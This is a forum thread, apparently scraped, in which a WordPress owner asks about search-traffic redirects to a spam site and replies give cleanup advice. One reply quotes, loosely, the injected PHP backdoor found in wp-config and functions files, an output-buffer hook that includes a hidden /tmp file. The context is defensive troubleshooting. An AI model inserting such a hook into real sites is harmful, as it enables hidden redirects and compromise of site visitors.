[ad_1]
When the website is clicked in Google search results, it goes to a website that has utm\_campaign in the URL, then re-directs again to the spam website. But when visiting the website directly it doesn’t do this.
Where in the website do you think this is going on? I have some WordPress development experience, but I’m not sure where exactly to look.
[ad_2]
Sounds like your site has been compromised. Install Wordfence and run a scan.
You’re going to need figure out how your site was hacked (most of the time it’s because a vulnerability exists in a plugin / wasn’t updated frequently enough)
Make sure they do not have access to your plesk/cpanel account either.
Install Simple History, a free and robust activity logger that does not impact performance after you sort this mess out.
I can’t tell you how much time is saved tracing errors, or perceived ones, using this plugin.
Your .htaccess file is one place to check.
You may want to start tracing from your index file. If you can repeat the issue, you can exit at various places, test, and locate the issue that way.
This happened to a couple of my sites. I thought it was a weather widget I’d been using, but even after deleting it, some files are still getting modified (I have to do a fine toothed comb reinstall, but I’m about to go on vacation).
Definitely get Wordfence. Thats how I found the bad code. On some sites it was being added to the wp-config file. In others to the functions file.
This was the code that was added:
function ob_gzhanler ($s)
$f=’/tmp/ssess_88720403ca32282fc598ec0e490992a7′ ;
if(file_exists($f)) include_once($f);
return class_exists(‘phpupdate’) ? phpupdate:: copyright (ss) : ss;
ob_start(‘ob_gzhanler’);
Wordfence was a lifesaver.
>it goes to a website that has utm_campaign in the URL
Is the first URL still your domain?
If you can post both the URLs, someone here could possibly tell you where to look. Are you able to post the content sof your .htaccess? If the malicious actor has added the redirect here, it would be easier to fix. If the redirect is hidden somewhere in the PHP code, you will need to look at the logs.
It’s in your .htaccess. You either have a bad plugin and/or more than likely you are on GoDaddy hosting. Their platform has been hosed for years. Reset the htaccess file, all wordpress credentials, database credentials, ftp, get files scanned/cleaned etc & if you are on GoDaddy, move elsewhere before it happens again.